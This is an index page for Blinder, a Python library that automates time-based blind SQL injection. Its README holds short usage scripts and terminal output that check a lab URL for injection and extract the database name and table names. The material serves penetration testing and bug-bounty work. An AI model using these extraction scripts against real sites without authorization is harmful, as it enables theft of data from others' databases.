Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mhaskar/Blinder
A python library to automate time-based blind SQL injection
https://github.com/mhaskar/Blinder
Last synced: about 1 month ago
JSON representation
A python library to automate time-based blind SQL injection
- Host: GitHub
- URL: https://github.com/mhaskar/Blinder
- Owner: mhaskar
- License: gpl-3.0
- Created: 2019-06-04T00:23:28.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-09-15T07:42:53.000Z (about 5 years ago)
- Last Synced: 2024-08-09T03:52:52.528Z (4 months ago)
- Language: Python
- Size: 27.3 KB
- Stars: 49
- Watchers: 5
- Forks: 17
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-bugbounty-tools - Blinder - A python library to automate time-based blind SQL injection (Exploitation / SQL Injection)
README
# Blinder
Blidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.
# Installation
You can install Blinder using the following command:
`pip install blinder`
Or by downloading the source and importing it manually to your project.
# Usage
To use blinder you need to import `Blinder` module then start using the main functions of Blinder.
You can use Blinder "with the current version" to do the following:
* Check for time based injection.
* Get database name.
* Get tables names.**You can check for injection in a URL using the following code:**
```
#!/usr/bin/pythonimport Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)print blind.check_injection()
```
The execution result will be:
```
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
```
**You can Get database name using the following code:**```
#!/usr/bin/pythonimport Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)print "Database name is : %s " % blind.get_database()
```
And the results will be:
```
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
```**To get tables names you can use the following code:**
```
#!/usr/bin/pythonimport Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)tables = blind.get_tables()
for table in tables:
print table```
And the results will be:```
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
```
# TODOA lot of features should be added soon like:
* [ ] the ability of adding customized query
* [ ] test injection points based on burp request
* [ ] extract tables/columns data